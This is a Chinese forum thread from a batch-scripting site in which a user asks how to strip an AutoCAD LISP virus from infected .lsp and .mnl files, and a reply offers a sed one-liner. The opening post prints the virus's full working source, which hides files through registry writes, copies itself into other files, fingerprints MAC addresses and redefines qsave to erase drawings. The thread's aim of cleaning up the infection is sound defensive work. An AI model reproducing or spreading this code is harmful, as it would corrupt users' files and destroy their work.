标题: [文件操作] 批处理怎样清除cad病毒? [打印本页]
作者: ftmm 时间: 2011-4-9 22:34 标题: 批处理怎样清除cad病毒?
以下是cad病毒代码,原文件名字叫做:acaddoc.lsp,与dwg文件放在一起的时候,autocad打开dwg文件,病毒就会被执行,感染lsp文件和mnl文件,这个两个文件都是文本方式保存。
我想请教一下,我想做一个bat来清除这个病毒,而不是简单的删除。我的思路是这样,列举出硬盘的mnl文件和lsp文件。大于200k的直接删除。
然后把剩下的mnl文件和lsp文件和一下代码对比,把相同的部分删除。以(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
为开头,最后的jjyy为结尾,中间部分清除。请问有什么思路?
我简化了一下思路,就是找到“(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
”字符串,把这个字符串以后的所有内容都删除,怎么做?用sed?
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
(vl-load-com)
(setvar "cmdecho" 0)
(setvar "filedia" 1)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"DefaultValue"
0
)
(setq mnlpth (getvar "menuname"))
(setq dwgpre (getvar "dwgprefix"))
(if (setq doclsp (findfile "acaddoc.lsp"))
(progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
(chklsp (strcat mnlpth ".mnl") doclsp)
(chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
)
)
(setq mac0
'(2256 2256 2726 2256 2585 2726 3243 2679
2726 2256 3149 2726 3196 3290 2726 2632
2397
)
)
(if (and (> (setq cdate (getvar "cdate")) 20090909)
(member (vl-string->list (car (macaddr))) (mkgroup mac0))
(= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
)
(dolsp)
)
(princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
(if (setq fp3 (open fp1 "r"))
(progn
(if
(not
(wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
"*;;;jjyy*"
)
)
(writelsp fp2 fp1)
)
(close fp3)
)
(writelsp fp2 fp1)
)
(attset fp1 2)
(attset fp2 2)
)
(defun writelsp (fp1 fp2 / fp3 fp4 tem)
(setq fp3 (open fp1 "r")
fp4 (open fp2 "a")
)
(while (setq tem (read-line fp3)) (write-line tem fp4))
(close fp3)
(close fp4)
(princ)
)
(defun attset (fp code / fp1)
(if (and (/= "" fp) code)
(progn (vl-load-com)
(vlax-put-property
(setq fp1 (vlax-invoke-method
(vlax-create-object "Scripting.FileSystemObject")
'GetFile
fp
)
)
'Attributes
code
)
)
)
(vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
(setq i 1)
(repeat 500
(setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
(setq i (1+ i))
)
(reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
(vl-load-com)
(if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
(progn
(setq
con (vl-catch-all-apply
'vlax-invoke
(list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
)
)
(if (vl-catch-all-error-p con)
(setq
con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
)
)
(setq lox (vlax-invoke
con
'ExecQuery
"Select * From Win32_NetworkAdapter "
)
)
(vlax-for i lox
(if (vlax-get i 'NetConnectionID)
(progn (setq sn (vlax-get i 'MACAddress))
(or (member sn mac) (setq mac (cons sn mac)))
)
)
)
(mapcar 'vlax-release-object (list lox con WMIobj))
)
)
(reverse mac)
)
(defun dolsp ()
(command "undefine" "qsave")
(command "undefine" "saveas")
(command "undefine" "wblock")
(command "undefine" "insert")
(command "undefine" "pline")
)
(defun c:qsave ()
(command "_.erase" (ssget "x") "")
(princ)
)
(defun c:saveas (/ fp1)
(setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
(chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
(findfile "acaddoc.lsp")
)
(princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
作者: ftmm 时间: 2011-4-9 23:20
大概有30行左右,请问如何删除?
作者: Batcher 时间: 2011-4-10 12:55
2# ftmm - sed -i "/(defun s::startup (\/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)/,$d" a.txt
作者: batman 时间: 2011-4-10 12:57
请先不要问我们的思路,你自己先把思路理好讲清楚可以?
作者: wc726842270 时间: 2011-4-10 13:55
感觉少了很多的内容。
1。想了解一下这个病毒的传播方式是不是与注册表有关。
2。感觉上你的问题很多。“好像”是不仅仅在于删除吧,如果是能否给个1234……
3。能否在需要操作的头尾作个简单的处理呢?
PS:别忘了CODE啊
作者: wuhengsi 时间: 2014-10-21 00:57
文件名称:CAD病毒专杀工具V1.0
软件大小:1.9MB
下载地址:http://pan.baidu.com/s/1bnleIlT (2014-10-21 日最新下载地址)
| 欢迎光临 批处理之家 (http://bbs.bathome.net/) |
Powered by Discuz! 7.2 |